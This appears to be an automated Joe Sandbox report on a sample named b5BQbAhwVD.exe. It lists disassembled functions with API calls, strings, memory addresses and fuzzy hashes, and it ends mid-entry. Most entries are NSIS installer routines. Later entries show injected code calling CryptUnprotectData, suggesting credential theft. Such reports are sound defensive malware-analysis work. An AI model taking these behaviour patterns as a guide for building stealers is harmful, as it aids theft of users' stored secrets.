Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A
C:\Users\user\AppData\Local\Temp\nss456A.tmp, xrefs: 004025E1

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nss456A.tmp$C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dll
API String ID: 3109718747-3343971643
Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E

Function 72ED18D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 72ED193A
GlobalFree.KERNEL32(?), ref: 72ED1ADA
GlobalFree.KERNEL32(?), ref: 72ED1ADF

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: a95bd82a7adface2c2481d3f261a68eda67c11f79fb7a6eae83c2f4e147fe631
Instruction ID: a68a5023cb72dd82efb3e1d701f95b5bfa127ea405762eeb63205557ee41f684
Opcode Fuzzy Hash: a95bd82a7adface2c2481d3f261a68eda67c11f79fb7a6eae83c2f4e147fe631
Instruction Fuzzy Hash: 0D51B732D001599FCF129FBCC6806AD7BBAEB4439CB50E25AE406AF144D6719E93C7B1

Function 72ED2394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 72ED24D6

Part of subcall function 72ED122C: lstrcpynW.KERNEL32(00000000,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED123C

GlobalAlloc.KERNEL32(00000040), ref: 72ED245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 72ED2477

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 7149328553fe970a70f7899724b5e99a1ec495f5e9f6690495f740c36c34b226
Instruction ID: 97779938154686ed7f8682b4365e68e23a14efc4eb27e6a05fcbfa8fa7707a32
Opcode Fuzzy Hash: 7149328553fe970a70f7899724b5e99a1ec495f5e9f6690495f740c36c34b226
Instruction Fuzzy Hash: FE41BDB5009306DFD311DF29E844B2A7BB8FB58314F50C95EF846CB582EB70A496CB62

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403A1A,76233420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
GlobalFree.KERNEL32(?), ref: 00403A64

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98

Function 72ED10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 72ED116A
GlobalFree.KERNEL32(00000000), ref: 72ED11C7
GlobalFree.KERNEL32(00000000), ref: 72ED11D9
GlobalFree.KERNEL32(?), ref: 72ED1203

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: f1fb71911fadde6b11be08000b2b95a28bcb433836419e565befee404e8e2af2
Instruction ID: 24ea598e64b6522871639b87065798813140908fb2750e24931a6f4d93491d84
Opcode Fuzzy Hash: f1fb71911fadde6b11be08000b2b95a28bcb433836419e565befee404e8e2af2
Instruction Fuzzy Hash: 8D319CB65412119FD3008F7DE945B2DBBECEB05315B90992EF846DF214E735D8828BA0

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Analysis Process: b5BQbAhwVD.exePID: 6424, Parent PID: 1280COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.8%
Total number of Nodes:	328
Total number of Limit Nodes:	21

Executed Functions

Function 3627D608 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$z(6, xrefs: 3627DA20
$z(6, xrefs: 3627D762
$z(6, xrefs: 3627DA14
<0^3, xrefs: 3627DAD0
$z(6, xrefs: 3627D76E

Memory Dump Source

Source File: 00000003.00000002.3389801515.0000000036270000.00000040.00000800.00020000.00000000.sdmp, Offset: 36270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36270000_b5BQbAhwVD.jbxd

Similarity

API ID: DispatchMessage
String ID: $z(6$$z(6$$z(6$$z(6$<0^3
API String ID: 2061451462-3720945997
Opcode ID: fa3583df3ab8d4ab11a1a17936b4b4f07d247bfd429af7ff6a83522e3a4cd4ac
Instruction ID: 9b0b284e608cd28b355afb29164bb7a42db4659cc7b06fa0c6aff31e7ec4ea92
Opcode Fuzzy Hash: fa3583df3ab8d4ab11a1a17936b4b4f07d247bfd429af7ff6a83522e3a4cd4ac
Instruction Fuzzy Hash: 32F14A74E0030ACFEB04DFA5C944B9DBBF2BF88304F668559D805AB266DB74E945CB80

Function 3387D1EC Relevance: 1.6, APIs: 1, Instructions: 55
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(0000005F,?,00000000,?,?,?,?), ref: 3387DA45

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 4a973c02d8a4aecd15f73f4217c797c21317df5636582b863eb20e19d3d2d713
Instruction ID: fb8b6a08621c62d1c534c630852c843eb1b5495dbf627b76e15d60c683012a4d
Opcode Fuzzy Hash: 4a973c02d8a4aecd15f73f4217c797c21317df5636582b863eb20e19d3d2d713
Instruction Fuzzy Hash: BD111476800249DFDB10CF99C845BDEBBF5EF48320F248419EA58A7211C379A954DFA5

Function 3387D9D9 Relevance: 1.6, APIs: 1, Instructions: 54
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(0000005F,?,00000000,?,?,?,?), ref: 3387DA45

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 59fecd85e60609dc9f10932f07ca6fffaa7df5cbe9e5a16b38f7a62a12dd2ae6
Instruction ID: fb9effa3583cad486063ec6ecb4b7c1c71127b7bf7e823cf18ab660cab2b294b
Opcode Fuzzy Hash: 59fecd85e60609dc9f10932f07ca6fffaa7df5cbe9e5a16b38f7a62a12dd2ae6
Instruction Fuzzy Hash: 501146B6800249DFDB10CF99C940BDEBFF5EF48320F248419EA58A7211C339A954DFA1

Function 33870C1B Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

^3, xrefs: 33870C99

Memory Dump Source

